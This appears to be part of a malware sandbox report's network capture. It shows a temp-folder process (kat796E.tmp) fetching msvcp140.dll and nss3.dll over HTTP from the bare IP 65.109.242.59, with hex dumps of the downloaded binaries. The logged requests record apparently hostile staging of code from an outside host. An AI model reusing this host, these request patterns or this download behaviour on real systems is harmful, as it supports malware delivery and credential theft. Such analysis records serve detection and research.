                                                                              2024-05-26 08:23:30 UTC16384INData Raw: 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8
                                                                              Data Ascii: H) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) sUSWV
                                                                              2024-05-26 08:23:30 UTC16384INData Raw: 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 83 f9 08 8b 7c 24 08 0f 83 b0 03 00 00 85 db 0f
                                                                              Data Ascii: D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F|$4rD$ D$ WVjjPS,VL$4|$
                                                                              2024-05-26 08:23:30 UTC16384INData Raw: 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c 24 89 7c 24 08 8b 4b 08 89 0c 24 89 53 04 0f a4
                                                                              Data Ascii: D$4P<|$\$t@)GD$ P08z.Jt_@u`|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<$|$K$S
                                                                              2024-05-26 08:23:30 UTC16384INData Raw: 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b 10 83 e2 fe 83 e1 01 09 d1 89 4e 04 89 30 8b 4b
                                                                              Data Ascii: XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKNN0K
                                                                              2024-05-26 08:23:30 UTC16384INData Raw: c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 85 c0 0f 84 c2 09 00 00 80 60 04 fe 8b 4c 24 0c
                                                                              Data Ascii: rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H`L$


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              22192.168.2.45268265.109.242.594436620C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-26 08:23:31 UTC174OUTGET /msvcp140.dll HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                              Host: 65.109.242.59
                                                                              Cache-Control: no-cache
                                                                              2024-05-26 08:23:32 UTC246INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sun, 26 May 2024 08:23:31 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 450024
                                                                              Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                              Connection: close
                                                                              ETag: "6315a9f4-6dde8"
                                                                              Accept-Ranges: bytes
                                                                              2024-05-26 08:23:32 UTC16138INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
                                                                              2024-05-26 08:23:32 UTC16384INData Raw: 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d 00 72 00 2d 00 69 00 6e 00 00 00 6d 00 73 00 2d
                                                                              Data Ascii: hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr-inms-
                                                                              2024-05-26 08:23:32 UTC16384INData Raw: 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 c8 8b 00 10 00
                                                                              Data Ascii: {|L@DX}0}}M@4}0}}4M@tXM}0}}XM@
                                                                              2024-05-26 08:23:32 UTC16384INData Raw: c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 fc dd e2 df e0 dd da f6 c4 44 7b 49 d9 c2 d8 c1
                                                                              Data Ascii: E]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u|_E^UQQMuU]EDB]ED{nt]B]ED{I
                                                                              2024-05-26 08:23:32 UTC16384INData Raw: f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b 83 c0 02 83 6d d4 01 75 ec 8b c2 85 c0 74 26 3b
                                                                              Data Ascii: f;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90utmut&;
                                                                              2024-05-26 08:23:32 UTC16384INData Raw: cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc 53 57 8b f9 83 7f 4c 00 75 04 33 db eb 24 56 e8
                                                                              Data Ascii: UjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jjSWLu3$V
                                                                              2024-05-26 08:23:32 UTC16384INData Raw: 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 51 e8 20 94 ff ff 83 7d fc 10 59 0f be 4d 14 89
                                                                              Data Ascii: r@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WENQ }YM
                                                                              2024-05-26 08:23:32 UTC16384INData Raw: 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 73 03 02 00 03 c3 89 04 f7 83 d2 00 8b da 89 5c
                                                                              Data Ascii: MS3R|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4s\
                                                                              2024-05-26 08:23:32 UTC16384INData Raw: 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c 69 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10
                                                                              Data Ascii: uF|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv|iqY(R
                                                                              2024-05-26 08:23:32 UTC16384INData Raw: 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 ee 01 74 11 83 7d ec 10 8d 45 d8 72 03 8b 45 d8
                                                                              Data Ascii: u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tWt}ErE


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              23192.168.2.45268365.109.242.594436620C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-26 08:23:33 UTC170OUTGET /nss3.dll HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                              Host: 65.109.242.59
                                                                              Cache-Control: no-cache
                                                                              2024-05-26 08:23:33 UTC248INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sun, 26 May 2024 08:23:33 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 2046288
                                                                              Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                              Connection: close
                                                                              ETag: "6315a9f4-1f3950"
                                                                              Accept-Ranges: bytes
                                                                              2024-05-26 08:23:33 UTC16136INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00
                                                                              Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
                                                                              2024-05-26 08:23:34 UTC16384INData Raw: 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a e9 51 fe ff ff c7 41 14 0b 00 00 00 8b 51 18
                                                                              Data Ascii: i)ff f@U |AAIQQAEq@AfAAi)\f fR |9U|&AVQ|A@fAfAA1<MAQAQ
                                                                              2024-05-26 08:23:34 UTC16384INData Raw: 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 08 8b 80 a0 00 00 00 83 e0 0c 83 f8 08 0f 85
                                                                              Data Ascii: ti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`|$\tD$euL$PhD$TD$E
                                                                              2024-05-26 08:23:34 UTC16384INData Raw: 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 8b 0d 48 11 1e 10 89 ca 09 c2 0f 84 b1 fe ff
                                                                              Data Ascii: w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SLH
                                                                              2024-05-26 08:23:34 UTC16384INData Raw: 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd 1b 10 68 78 fc 1b 10 6a 0e e8 0a 8f 02 00 83
                                                                              Data Ascii: $pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hhhxj
